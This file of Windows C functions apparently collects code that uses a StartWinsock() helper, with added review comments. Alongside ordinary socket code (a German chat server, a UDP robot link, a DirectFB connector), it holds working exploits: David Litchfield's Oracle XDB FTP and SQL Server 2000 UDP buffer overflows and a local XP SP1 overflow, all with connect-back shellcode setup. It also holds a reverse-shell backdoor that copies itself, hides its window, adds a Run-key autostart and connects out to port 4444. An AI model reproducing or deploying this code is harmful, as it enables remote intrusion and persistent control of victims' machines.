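/*
 * Oracle XDB FTP "UNLOCK" buffer-overflow exploit (David Litchfield, 6 July 2003).
 *
 * Usage: <host> <userid> <password> <ipaddress> <port>
 *   argv[1]            target host, copied into the global `host`
 *   argv[2] / argv[3]  FTP credentials handed to GainControlOfOracle()
 *   argv[4] / argv[5]  address and port the spawned reverse shell connects back to
 *
 * Returns 0 after printing usage or after GainControlOfOracle() returns; if
 * Winsock cannot be started it returns the (non-zero) printf() character count,
 * as the original did.
 *
 * Globals used (defined elsewhere in the file): host, exploit_code, short_jump,
 * exception_handler, exploit. Their sizes are not visible here, so the strcat()
 * chain below is unbounded and relies on exploit_code being large enough for
 * the three fragments plus "\r\n".
 */
int main(int argc, char *argv[])
{
	if (argc != 6)
	{
		printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit");
		printf("\n\t\tfor Blackhat (http://www.blackhat.com)");
		printf("\n\n\tSpawns a reverse shell to specified port");
		printf("\n\n\tUsage:\t%s host userid password ipaddress port", argv[0]);
		printf("\n\n\tDavid Litchfield\n\t([email protected])");
		printf("\n\t6th July 2003\n\n\n");
		return 0;
	}

	/* strncpy() leaves no terminator when argv[1] is 250 bytes or longer. The
	 * call already writes 250 bytes into host, so host[249] is inside the
	 * buffer the original code assumes. */
	strncpy(host, argv[1], 250);
	host[249] = '\0';

	if (StartWinsock() == 0)
		return printf("Error starting Winsock.\n");

	/* Patch the connect-back address and port into the shellcode. atoi() gives
	 * no error indication for a malformed port. */
	SetUpExploit(argv[4], atoi(argv[5]));

	/* Assemble the payload: short jump, the fragment named exception_handler,
	 * the shellcode, then the CRLF that terminates the FTP command line. */
	strcat(exploit_code, short_jump);
	strcat(exploit_code, exception_handler);
	strcat(exploit_code, exploit);
	strcat(exploit_code, "\r\n");

	GainControlOfOracle(argv[2], argv[3]);
	return 0;
}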
     /*
      * Local exploit for a program launched as "nes": its command-line argument is
      * built to overflow a stack buffer in that program, and WinExec() runs it.
      *
      * Usage: <ipaddress> <port> -- patched into the global shellcode `exploit` by
      * SetUpExploit(); any other argument count exits silently with 0.
      * The overwrite addresses below are specific to Windows XP SP1 (per the
      * original author's comments).
      *
      * NOTE(review): `exploit` is a global whose size is not visible here; it is
      * appended to the 1000-byte stack buffer with an unbounded strcat(). The
      * fixed part is 4 ("nes ") + 104 NOPs + 15 address bytes, so at most 876
      * bytes of shellcode fit before this exploit overflows its own buffer.
      */
     int main(int argc, char *argv[])
     {
            int cnt = 0;
            unsigned char buffer[1000]="";

            if(argc !=3)
                    return 0;

            // Return value is not checked; a Winsock failure only surfaces later.
            StartWinsock();

            // Set the IP address and port in the exploit code
            // If your IP address has a NULL in it then the
            // string will be truncated.
            SetUpExploit(argv[1],atoi(argv[2]));

            // name of the vulnerable program
            strcpy(buffer,"nes ");
            // copy exploit code to the buffer (unbounded, see note above)
            strcat(buffer,exploit);

            // Pad out the buffer: 25 x 4 NOPs (0x90) plus 4 more = 104 bytes.
            while(cnt < 25)
            {
                    strcat(buffer,"\x90\x90\x90\x90");
                    cnt ++;
            }

            strcat(buffer,"\x90\x90\x90\x90");

            // Here's where we overwrite the saved return address
            // This is the address of lstrcatA on Windows XP SP 1
            // 0x77E74B66 (written little-endian below)
            strcat(buffer,"\x66\x4B\xE7\x77");

            // Set the return address for lstrcatA
            // this is where our code will be copied to
            // in the TEB (0x7FFDE1BC)
            strcat(buffer,"\xBC\xE1\xFD\x7F");

            // Set the destination buffer for lstrcatA
            // This is in the TEB and we'll return to
            // here (same address as above).
            strcat(buffer,"\xBC\xE1\xFD\x7F");

            // This is our source buffer. This is the address
            // where we find our original buffer on the stack.
            // Only three bytes are appended on purpose: the fourth byte (0x00)
            // is the string's own terminator, giving 0x0012FB10 without an
            // embedded NUL, which is why this must be the last element.
            strcat(buffer,"\x10\xFB\x12");

            // Now execute the vulnerable program! The whole buffer is the
            // command line, so the payload reaches the target via lpCmdLine.
            WinExec(buffer,SW_MAXIMIZE);

            return 0;
     }
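/*
 * Server entry point: starts the logger and Winsock, opens the listening socket
 * on SERVER_PORT and hands it to ServerLoop().
 *
 * Returns 1 when ServerLoop() returns (the existing success convention, kept for
 * callers), -1 if Winsock could not be started or the listening socket could not
 * be created. Winsock is released on every path after it was started.
 */
int EntryPoint(void) {
    SOCKET s;

    StartLogger(TEXT(LOGFILE));

    if(StartWinsock() != 0)
        return -1;

    s = CreateListenSocket(SERVER_PORT);
    if((s == SOCKET_ERROR) || (s == INVALID_SOCKET)) {
        /* Winsock was started above; the original returned without releasing it. */
        WSACleanup();
        return -1;
    }
    ServerLoop(s);

    /* NOTE(review): whether ServerLoop() closes `s` is not visible here; if it
     * does not, closesocket(s) belongs before WSACleanup(). */
    WSACleanup();

    return 1;
}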
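/*
 * Client entry point: connects to REMOTE_ADDR (or argv[1] when given) on
 * SERVER_PORT, runs ClientHandshake() and, if that succeeds, CommandLoop().
 *
 * Returns EXIT_FAILURE if Winsock could not be started or the connection could
 * not be made, EXIT_SUCCESS otherwise (a failed handshake still exits with
 * success, as before).
 *
 * Uses the global `conn` (dh_remote_key, dh_shared_key, nonce), defined
 * elsewhere; the three buffers are freed here on the normal exit path.
 */
int main(int argc, char **argv) {
	SOCKET s;
	char *remote;

	/* An optional first argument overrides the compiled-in address. */
	remote = (argc > 1) ? argv[1] : REMOTE_ADDR;

	printf("Starting Winsock... ");
	if(StartWinsock() != 0) {
		printf("Failed.\n");
		return EXIT_FAILURE;
	}
	printf("OK.\n");

	printf("Connecting to %s:%d... ", remote, SERVER_PORT);

	/* NOTE(review): only SOCKET_ERROR is treated as failure here, whereas the
	 * server side also tests INVALID_SOCKET; what CreateConnectSocket() returns
	 * on failure is not visible from this block. */
	if((s = CreateConnectSocket(remote, SERVER_PORT)) == SOCKET_ERROR) {
		printf("Failed.\n");
		/* Winsock was started above; the original returned without releasing it. */
		WSACleanup();
		return EXIT_FAILURE;
	}
	printf("OK.\n\n");

	if(ClientHandshake(s))
		CommandLoop(s);

	/* NOTE(review): whether ClientHandshake()/CommandLoop() close `s` is not
	 * visible here; if not, closesocket(s) belongs before WSACleanup(). */
	WSACleanup();

	/* free(NULL) is a no-op, so no null checks are needed.
	 * NOTE(review): dh_shared_key is key material. Its length is not visible in
	 * this block, but it should be wiped (e.g. SecureZeroMemory) before free(). */
	free(conn.dh_remote_key);
	free(conn.dh_shared_key);
	free(conn.nonce);

#ifdef _DEBUG
	showmemstats(stdout);
#endif

	return EXIT_SUCCESS;
}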
/*
 * Construct the UDP link to the remote host.
 *
 * port        server port to use; values below 10 are treated as "unset" and
 *             replaced by FRI_DEFAULT_SERVER_PORT
 * remoteHost  passed unchanged to Init()
 *
 * Aborts the process with exit(1) if the FRI_CHECK_SIZES_OK structure-size check
 * fails. On WIN32, Winsock is started (return value not checked) before Init().
 */
friUdp::friUdp(int port, char * remoteHost) : serverPort(port)
{
	// Refuse to run if the wire structures do not have the expected layout.
	if (!FRI_CHECK_SIZES_OK)
	{
		printf("data structure size error!\n");
		exit(1);
	}

	// Callers such as Simulink blocks may leave the port at a default like 0;
	// anything below 10 falls back to the library default.
	if (serverPort < 10)
	{
		serverPort = FRI_DEFAULT_SERVER_PORT;
	}

	m_timestamp = 0;

#ifdef WIN32
	StartWinsock();
#endif

	Init(remoteHost);
}
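// Start listening for TCP connections on Port, on every local interface.
// Returns the port number actually listened on, or 0 if anything failed. On
// failure Winsock is shut down again and SocketListen is reset to NULL, so the
// caller has nothing to release.
//
// Accepted connections are reported asynchronously as WM_SOCKET messages to the
// fMain window (WSAAsyncSelect).
int StartListen(int Port)
{
	// If winsock doesn't start return false
	if (!StartWinsock())
		return 0;

	// Out-of-range ports fall back to 80 (existing behaviour). Note that
	// 32768-65535 are valid TCP ports but are treated as invalid here.
	if ((Port < 1) || (Port > 32767))
		Port = 80;

	SocketListen = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if (SocketListen == INVALID_SOCKET)
	{
		// Winsock was started above; release it, as the bind failure path does.
		CloseWinsock();
		SocketListen = NULL;
		return 0;
	}

	// Value-initialise so sin_zero is not handed to bind() uninitialised.
	sockaddr_in SockAddr = {};

	SockAddr.sin_family = AF_INET;
	SockAddr.sin_port = htons(Port);
	// INADDR_ANY: reachable from every interface, not only loopback.
	SockAddr.sin_addr.S_un.S_addr = INADDR_ANY;

	// bind(), listen() and WSAAsyncSelect() all return 0 on success. The
	// original checked only bind() and left the socket open on that path.
	if (bind(SocketListen, (sockaddr*)(&SockAddr), sizeof(SockAddr)) != 0
		|| listen(SocketListen, 1) != 0
		|| WSAAsyncSelect(SocketListen, fMain, WM_SOCKET, FD_CONNECT | FD_ACCEPT) != 0)
	{
		closesocket(SocketListen);
		CloseWinsock();
		SocketListen = NULL;
		return 0;
	}

	return Port;
}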
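/*
 * Minimal TCP "chat" server: listens on port 12345 on every local interface,
 * accepts a single client, then alternates between printing what the client
 * sent and sending one line read from stdin.
 *
 * Returns 1 on any Winsock setup error (after printing the WSA error code),
 * 0 once the client disconnects or stdin is exhausted. The connection is
 * unauthenticated and unencrypted; anything the peer sends is printed as-is.
 */
int main()
{
	// Test output
	printf("Socket Client\n");

	// Initialise variables
	long returnvalue;
	char buf[256];
	SOCKET acceptSocket;
	SOCKET connectedSocket;
	SOCKADDR_IN addr;

	// Start Winsock
	returnvalue = StartWinsock();
	if(returnvalue != 0)
	{
		// %ld: returnvalue is a long (the original used %d, a format mismatch)
		printf("Fehler: StartWinsock Fehlercode: %ld!\n",returnvalue);
		return 1;
	}
	else
	{
		printf("Winsock gestartet!\n");
	}

	// Create the listening socket
	acceptSocket = socket(AF_INET,SOCK_STREAM,0);
	if(acceptSocket == INVALID_SOCKET)
	{
		printf("Fehler: Der Socket konnte nicht erstellt werden, fehler code: %d\n",WSAGetLastError());
		WSACleanup();
		return 1;
	}
	else
	{
		printf("Socket erstellt!\n");
	}

	// Bind to port 12345 on all interfaces (ADDR_ANY)
	memset(&addr,0,sizeof(SOCKADDR_IN));
	addr.sin_family = AF_INET;
	addr.sin_port = htons(12345);
	addr.sin_addr.s_addr = ADDR_ANY;
	returnvalue = bind(acceptSocket,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));

	if(returnvalue == SOCKET_ERROR)
	{
		printf("Fehler: bind, fehler code: %d\n",WSAGetLastError());
		closesocket(acceptSocket);
		WSACleanup();
		return 1;
	}
	else
	{
		printf("Socket an port 12345 gebunden\n");
	}

	// Start listening
	returnvalue = listen(acceptSocket,10);
	if(returnvalue == SOCKET_ERROR)
	{
		printf("Fehler listen, fehler code: %d",WSAGetLastError());
		closesocket(acceptSocket);
		WSACleanup();
		return 1;
	}
	else
	{
		printf("AcceptSocket ist im Listen-Modus ...\n");
	}

	// Wait for one connection
	connectedSocket = accept(acceptSocket,NULL,NULL);
	if(connectedSocket == INVALID_SOCKET)
	{
		printf("Fehler: accept, fehler code: %d\n",WSAGetLastError());
		closesocket(acceptSocket);
		WSACleanup();
		return 1;
	}
	else
	{
		printf("Neue Verbindung wurde akzeptiert!\n");
	}

	// Chat loop: runs until the peer closes the connection or stdin hits EOF
	while(1)
	{
		// Wait for input from the peer
		printf("[-] Warte auf Input ...\n\n");
		memset(buf,0,sizeof(buf));
		returnvalue = recv(connectedSocket,buf,255,0);
		if(returnvalue == 0 || returnvalue == SOCKET_ERROR)
		{
			// 0 means the peer closed the connection; the original kept
			// looping here and prompted forever on a dead socket.
			printf("Fehler: recv, fehler code: %d\n",WSAGetLastError());
			break;
		}
		buf[returnvalue]=0;
		printf("Antwort: %s\n\n",buf);

		// Send one line from stdin
		printf("Senden: ");
		if(fgets(buf,255,stdin) == NULL)
			break;
		// Send only the line that was read. The original sent all 255 bytes,
		// which included whatever the peer had sent previously (the bytes
		// after the terminator) and echoed that back over the wire.
		send(connectedSocket,buf,(int)strlen(buf),0);
		printf("\nNachricht gesendet!\n\n");
	}

	closesocket(connectedSocket);
	closesocket(acceptSocket);
	WSACleanup();

	// End of program
	printf("\n");
	return 0;
}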
/*
 * NOTE(review): this is a reverse-shell backdoor; it is kept here for analysis.
 *
 * On start it copies its own executable to a fixed path derived from the current
 * directory, hides its console window and writes that path under
 * HKCU\Software\Microsoft\Windows\CurrentVersion\Run (autostart persistence),
 * connects a child process's stdin/stdout to pipes (CreateChildProcess()), then
 * keeps trying to connect to `dyndns`:4444 until it succeeds and relays between
 * the socket and the child (WriteToPipe()/ReadFromPipe()) until `exitOnForce`
 * is set.
 *
 * Every network step is retried every 60 s forever; the only early exits are the
 * exit(2..5) calls when pipe setup fails.
 *
 * Globals used (defined elsewhere): sock, g_hChildStd_{IN,OUT}_{Rd,Wr},
 * exitOnForce. Helpers not visible here: CreateChildProcess, getAddrFromString,
 * WriteToPipe, ReadFromPipe.
 *
 * Defects visible in this block (not fixed, see inline notes): unchecked
 * _getcwd() result and an unbounded scan of it; strcat() past the buffer
 * _getcwd() allocated; a printf() with a %s but no argument (DEBUG build);
 * argv[1] used without checking argc (DEBUG build).
 */
int main(int argc, char** argv)
{
	// Connect-back host; a placeholder that has to be edited before building.
	char dyndns[] ="www.youradress.com";

	// Build the destination path for the self-copy: the current directory cut
	// at its second backslash (e.g. "C:\Users\x\y" -> "C:\Users"), plus a
	// fixed file name.
	// NOTE(review): _getcwd(NULL, 0) is not checked for NULL. The loop has no
	// length bound, so a path with fewer than two backslashes is read past its
	// terminator. _getcwd(NULL, 0) presumably allocates only enough for the
	// path itself, so the strcat() after the loop writes beyond the allocation
	// (heap overflow) whenever the part after the second backslash is shorter
	// than the 17 bytes appended.
	char * buffer;
	buffer = _getcwd(NULL, 0);
	int counter =0;

	for(int i = 0;;i++)
	{
		if(counter == 2)
		{
			// Cut at the second backslash (or at '>'); no terminator check.
			if(buffer[i] == '\\' || buffer[i] == '>')
			{
				buffer[i] = 0;
				break;
			}
		}

		if(buffer[i]=='\\')
		{
			counter++;
		}
	}
	strcat(buffer,"\\yourfilename.exe");

	// Copy the running executable (argv[0] exactly as invoked, possibly a
	// relative name) to the path built above; bFailIfExists is false, so an
	// existing copy is overwritten. The return value is not checked.
	CopyFileA(argv[0],buffer,false);


#if !DEBUG
	// Hide the console window (non-DEBUG builds only).

	HWND hWnd = GetConsoleWindow();
	ShowWindow( hWnd, SW_HIDE );

	//Setting the console name for fun and profit
	//char name[]="SPARTA";
	//SetConsoleTitleA(name);

	// Autostart persistence: the per-user Run key.
	char subkey[]= "Software\\Microsoft\\Windows\\CurrentVersion\\Run";

	//char cwd[1024];
	//char asf[] = "lolololol";
	//_getcwd(cwd,1024);
	//strcat(cwd,"\\");
	//strcpy(cwd,**argv);
	//strcat(cwd,argv[0]);

	// NOTE(review): RegSetValueA is the legacy API that writes the subkey's
	// default (unnamed) value rather than a named Run entry -- confirm whether
	// that is honoured at logon. cbData is 0; the return value is ignored.
	DWORD shit=0;
	RegSetValueA(HKEY_CURRENT_USER,subkey,REG_SZ, buffer, shit);
#endif

	// Test output
#if DEBUG
	printf("Socket Client\n");
#endif

	// Initialise variables
	long returnvalue;
	SOCKADDR_IN addr;
	SECURITY_ATTRIBUTES saAttr;

#if DEBUG
	printf("\n->Start of parent execution.\n");
#endif

	// Set the bInheritHandle flag so pipe handles are inherited. 

	saAttr.nLength = sizeof(SECURITY_ATTRIBUTES); 
	saAttr.bInheritHandle = TRUE; 
	saAttr.lpSecurityDescriptor = NULL; 

	// Create a pipe for the child process's STDOUT. 

	if ( ! CreatePipe(&g_hChildStd_OUT_Rd, &g_hChildStd_OUT_Wr, &saAttr, 0) ) 
		exit(2); 

	// Ensure the read handle to the pipe for STDOUT is not inherited.

	if ( ! SetHandleInformation(g_hChildStd_OUT_Rd, HANDLE_FLAG_INHERIT, 0) )
		exit(3); 

	// Create a pipe for the child process's STDIN. 

	if (! CreatePipe(&g_hChildStd_IN_Rd, &g_hChildStd_IN_Wr, &saAttr, 0)) 
		exit(4); 

	// Ensure the write handle to the pipe for STDIN is not inherited. 

	if ( ! SetHandleInformation(g_hChildStd_IN_Wr, HANDLE_FLAG_INHERIT, 0) )
		exit(5); 

	// Create the child process (body not visible here). 

	CreateChildProcess();

	// Socket handling from here on...

	// Start Winsock; retry every 60 s until it succeeds
	do
	{
		returnvalue = StartWinsock();
		if(returnvalue != 0)
		{
#if DEBUG
			// %d with a long argument: format/argument mismatch.
			printf("[-] Fehler: StartWinsock Fehlercode: %d!\n",returnvalue);
#endif
			Sleep(60000);
		}
#if DEBUG
		else
		{
			printf("[+] Winsock gestartet!\n");
		}
#endif
	}
	while(returnvalue != 0);

	// Create the socket (global `sock`); retry every 60 s
	do
	{
		sock = socket(AF_INET,SOCK_STREAM,0);
		if(sock == INVALID_SOCKET)
		{
#if DEBUG
			printf("[-] Fehler: Der Socket konnte nicht erstellt werden, fehler code: %d\n",WSAGetLastError());
#endif
			Sleep(60000);
		}
#if DEBUG
		else
		{
			printf("[+] Socket erstellt!\n");
		}
#endif
	}
	while(sock == INVALID_SOCKET);

	// Fill in the connect-back port (hard-coded 4444); the address is resolved below
	memset(&addr,0,sizeof(SOCKADDR_IN));
	addr.sin_family = AF_INET;
	addr.sin_port = htons(4444);
	//addr.sin_addr.s_addr = inet_addr("127.0.0.1");

	// Resolve `dyndns` into addr; retry every 60 s
	do
	{
		returnvalue = getAddrFromString(dyndns,&addr);
		if(returnvalue == SOCKET_ERROR)
		{
#if DEBUG
		// NOTE(review): the format string has a %s but no matching argument:
		// undefined behaviour (printf reads a stray pointer).
		printf("[-] Fehler: IP für %s konnte nicht aufgeloest werden.\n");
#endif
		Sleep(60000);
		}
#if DEBUG
		else
		{
		printf("[+] IP aufgelöst!\n");
		}
#endif
	}
	while(returnvalue == SOCKET_ERROR);

	// Connect; retry every 60 s
	do
	{
		returnvalue = connect(sock, (SOCKADDR*)&addr, sizeof(SOCKADDR));
		if(returnvalue == SOCKET_ERROR)
		{
#if DEBUG
			printf("[-] Fehler: connect gescheitert, fehler code: %d\n",WSAGetLastError());
#endif
			Sleep(60000);
		}
#if DEBUG
		else
		{
			// NOTE(review): argv[1] is used without checking argc (NULL when
			// run without arguments), and the peer actually connected to is
			// `dyndns`, not argv[1].
			printf("[+] Verbindung hergestellt mit %s\n",argv[1]);
		}
#endif
	}
	while(returnvalue == SOCKET_ERROR);

	// Relay loop. Judging by the names, WriteToPipe() feeds the child's stdin
	// and ReadFromPipe() returns its stdout; their bodies are not visible here.
	for(;;)
	{
#if DEBUG
		// Waiting for input
		printf("[-] Warte auf Input ...\n\n");
#endif

		WriteToPipe(); 

		ReadFromPipe();

		// exitOnForce is a global set elsewhere (presumably by the helpers).
		if(exitOnForce)
		{
#if DEBUG
			printf("\n->SYSTEM GOING DOWN!\n");
#endif
			break;
		}
	}
#if DEBUG
	printf("\n->End of parent execution.\n");
#endif

	// The remaining open handles are cleaned up when this process terminates. 
	// To avoid resource leaks in a larger application, close handles explicitly. 
	// (The socket is likewise never closed and WSACleanup() is never called.)

	return 0;
}
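/*
 * SQL Server 2000 Resolution Service (UDP) stack-overflow exploit
 * (David Litchfield, modified by lion).
 *
 * Usage: Target [<NCHost> <NCPort> <SQLSP>]
 *   argc == 2  send only the `ping` request (GainControlOfSQL with request = ping)
 *   argc == 5  full exploit: argv[2]/argv[3] are the host and port the shell
 *              connects back to, argv[4] the target's service-pack level ('0'
 *              selects the SP0 GetProcAddress import slot, anything else SP1/SP2)
 *
 * Returns 0 in every case except an unusable connect-back address or port, which
 * is reported and returns 1 before anything is sent.
 *
 * Globals (defined elsewhere): host, request, ping, exploit_code. Their sizes
 * are not visible here: the strcpy() of exploit_code into the 400-byte local
 * buffer and the strcat() chain into `request` are unbounded.
 */
int main(int argc, char *argv[])
{
	unsigned int ErrorLevel = 0;
	char ipaddress[40] = "";
	unsigned short port = 0;
	unsigned int ip = 0;
	char *ipt;
	char buffer[400] = "";
	unsigned short prt = 0;
	char *prtt;
	long portarg;

	if(argc != 2 && argc != 5)
	{
		printf("===============================================================\r\n");
		printf("SQL Server UDP Buffer Overflow Remote Exploit\r\n\n");
		printf("Modified from \"Advanced Windows Shellcode\"\r\n");
		printf("Code by David Litchfield, [email protected]\r\n");
		printf("Modified by lion, fix a bug.\r\n");
		printf("Welcome to HUC Website http://www.cnhonker.com\r\n\n");
		printf("Usage:\r\n");
		printf("    %s Target [<NCHost> <NCPort> <SQLSP>]\r\n\n", argv[0]);
		printf("Exemple:\r\n");
		printf("Target is MSSQL SP 0:\r\n");
		printf("    C:\\>nc -l -p 53\r\n");
		printf("    C:\\>%s db.target.com 202.202.202.202 53 0\r\n",argv[0]);
		printf("Target is MSSQL SP 1 or 2:\r\n");
		printf("    c:\\>%s db.target.com 202.202.202.202\r\n\n", argv[0]);
		return 0;
	}

	/* strncpy() leaves no terminator for a 100+ byte argument. The call already
	 * writes 100 bytes into host, so host[99] is inside the assumed buffer. */
	strncpy(host, argv[1], 100);
	host[99] = '\0';

	if(argc == 5)
	{
		/* ipaddress[36..39] stay zero from the initializer, so this is terminated. */
		strncpy(ipaddress, argv[2], 36);

		/* Validate the port instead of silently truncating it to 16 bits. */
		portarg = atol(argv[3]);
		if(portarg < 1 || portarg > 65535)
		{
			printf("Invalid NCPort: %s\r\n", argv[3]);
			return 1;
		}
		port = (unsigned short)portarg;

		// SQL Server 2000 Service pack level
		// The import entry for GetProcAddress in sqlsort.dll
		// is at  0x42ae1010 but on SP 1 and 2 is at  0x42ae101C
		// Need to set the last byte accordingly

		if(argv[4][0] == '0')
		{
			printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n");
			exploit_code[9] = 0x10;
		}
		else
		{
			printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n");
		}
	}

	/* This StartWinsock() reports failure with 0 (opposite of the WSAStartup
	 * convention used by other examples in this file). */
	ErrorLevel = StartWinsock();
	if(ErrorLevel == 0)
	{
		printf("Starting Winsock Error.\r\n");
		return 0;
	}

	if(argc == 2)
	{
		strcpy(request, ping);

		GainControlOfSQL();
		return 0;
	}

	strcpy(buffer, exploit_code);

	// set this IP address to connect back to
	// this should be your address
	ip = inet_addr(ipaddress);
	if(ip == INADDR_NONE)
	{
		/* The original patched 0xFFFFFFFF into the shellcode and fired anyway. */
		printf("Invalid NCHost address: %s\r\n", ipaddress);
		return 1;
	}
	/* Patched at fixed offsets 142..145 of the shellcode, in network byte order. */
	ipt = (char*)&ip;
	buffer[142] = ipt[0];
	buffer[143] = ipt[1];
	buffer[144] = ipt[2];
	buffer[145] = ipt[3];

	// set the TCP port to connect on
	// netcat should be listening on this port
	// e.g. nc -l -p 80

	/* Stored bitwise-NOTed at offsets 160..161; the shellcode presumably undoes
	 * this, which keeps ports below 256 free of NUL bytes. */
	prt = htons(port);
	prt = prt ^ 0xFFFF;
	prtt = (char *)&prt;
	buffer[160] = prtt[0];
	buffer[161] = prtt[1];

	/* 96 bytes of filler up to the saved return address. */
	strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX");

	// Overwrite the saved return address on the stack
	// This address contains a jmp esp instruction
	// and is in sqlsort.dll.

	strcat(request,"\xDC\xC9\xB0\x42"); // 0x42B0C9DC

	// Need to do a near jump: EB 0E skips the 6 filler bytes and the two
	// 4-byte writable addresses below (14 bytes) and lands on the NOPs.
	strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46");

	// Need to set an address which is writable or
	// sql server will crash before we can exploit
	// the overrun. Rather than choosing an address
	// on the stack which could be anywhere we'll
	// use an address in the .data segment of sqlsort.dll
	// as we're already using sqlsort for the saved
	// return address

	// SQL 2000 no service packs needs the address here
	strcat(request,"\x01\x70\xAE\x42");

	// SQL 2000 Service Pack 2 needs the address here
	strcat(request,"\x01\x70\xAE\x42");

	// just a few nops
	strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90");

	// tack on exploit code to the end of our request and fire it off
	strcat(request, buffer);

	GainControlOfSQL();

	return 0;
}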
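/*
 * Open a TCP connection to hostname:port and populate `link` with the
 * socket-backed implementation. This is the Winsock variant (StartWinsock(),
 * INVALID_SOCKET, WSACreateEvent()).
 *
 * hostname must be a dotted-quad IPv4 address: it is parsed with inet_addr(),
 * which does no name resolution. A bad address yields INADDR_NONE and makes the
 * connect() below fail; it is not diagnosed separately.
 *
 * When `raw` is false the 4-byte magic 0x80008676 (host byte order) is sent as
 * the first bytes of the stream.
 *
 * Returns DR_OK on success; D_OOM() if the Link could not be allocated; the
 * errno-derived result if socket() or connect() failed; DR_IO if the magic could
 * not be written or the wake-up event could not be created. Every failure path
 * releases what it acquired (the original leaked the socket on the last two).
 */
DirectResult
voodoo_link_init_connect( VoodooLink *link,
                          const char *hostname,
                          int         port,
                          bool        raw )
{
     int                 ret;
     struct sockaddr_in  addr = { 0 };   /* zeroed so sin_zero is not uninitialised */
     Link               *l;

     D_INFO( "Voodoo/Link: Connecting to '%s:%d'...\n", hostname, port );

     StartWinsock();

     l = D_CALLOC( 1, sizeof(Link) );
     if (!l)
          return D_OOM();

     l->socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
     if (l->socket == INVALID_SOCKET) {
          /* NOTE(review): Winsock reports errors through WSAGetLastError(), not
           * errno, so errno2result(errno) may map a stale value here. Kept as is. */
          ret = errno2result( errno );
          D_PERROR( "Voodoo/Link: Socket creation failed!\n" );
          D_FREE( l );
          return ret;
     }

     addr.sin_family      = AF_INET;
     addr.sin_addr.s_addr = inet_addr( hostname );
     addr.sin_port        = htons( port );

     ret = connect( l->socket, (const struct sockaddr*) &addr, sizeof(addr) );
     if (ret < 0) {
          ret = errno2result( errno );
          D_PERROR( "Voodoo/Link: Socket connect failed!\n" );
          closesocket( l->socket );
          D_FREE( l );
          return ret;
     }

     if (!raw) {
          link->code = 0x80008676;

          if (send( l->socket, (const char*) &link->code, sizeof(link->code), 0 ) != (int) sizeof(link->code)) {
               D_ERROR( "Voodoo/Link: Coult not write initial four bytes!\n" );
               closesocket( l->socket );
               D_FREE( l );
               return DR_IO;
          }
     }

     /* Acquire the remaining resources only once the connection is fully set
      * up, so the failure paths above have nothing else to release. */
     l->event = WSACreateEvent();
     if (l->event == WSA_INVALID_EVENT) {
          D_ERROR( "Voodoo/Link: Could not create event!\n" );
          closesocket( l->socket );
          D_FREE( l );
          return DR_IO;
     }

     direct_mutex_init( &l->lock );

     link->priv        = l;
     link->Close       = Close;
     link->Read        = Read;
     link->Write       = Write;
     link->SendReceive = SendReceive;
     link->WakeUp      = WakeUp;
     link->WaitForData = WaitForData;

     return DR_OK;
}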